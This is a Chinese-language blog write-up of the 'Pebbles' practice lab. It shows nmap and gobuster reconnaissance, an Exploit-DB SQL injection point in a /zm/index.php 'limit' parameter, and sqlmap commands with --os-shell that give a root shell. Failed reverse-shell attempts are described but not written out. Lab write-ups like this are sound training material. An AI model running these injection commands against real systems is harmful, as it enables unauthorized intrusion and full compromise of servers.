Pebbles SQLmap爆破

简介

point 10

Pebbles

Difficulty Easy

rated by community HARD

 

实验环境

攻击者 Kali 192.168.45.197

受害者 IP 192.168.171.52  Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.171.52

21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))

 

8080端口没用

尝试匿名访问ftp 无效

 

gobuster爆破  这次需要使用big.txt 否则会漏掉非常重要的内容

gobuster dir -u http://192.168.171.52:3305/ -w /usr/share/dirb/wordlists/big.txt

2024-05-02_22-22

2024-05-02_22-221

 

https://www.exploit-db.com/exploits/41239

这里的POC能尝试Sql注入

view=request&request=log&task=query&limit=100;

 

sqlmap http://192.168.171.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit
sqlmap http://192.168.171.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit --os-shell

这样 我们就得到了非常垃圾的shell

2024-05-02_22-43

速度非常缓慢

2024-05-02_22-44

尝试一般的nc和bash反弹shell都是无效的

幸运的是我们是root可以直接查看flag

但我还是希望能得到好的反弹shell

但是尝试之后还是不行 答案是这样写的

需要先从kali中拿到好的nc 传给受害者

然后受害者用nc反弹shell

我尝试用答案的方法写 仍然无效

2024-05-02_22-51

 

 

 

 

 
© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片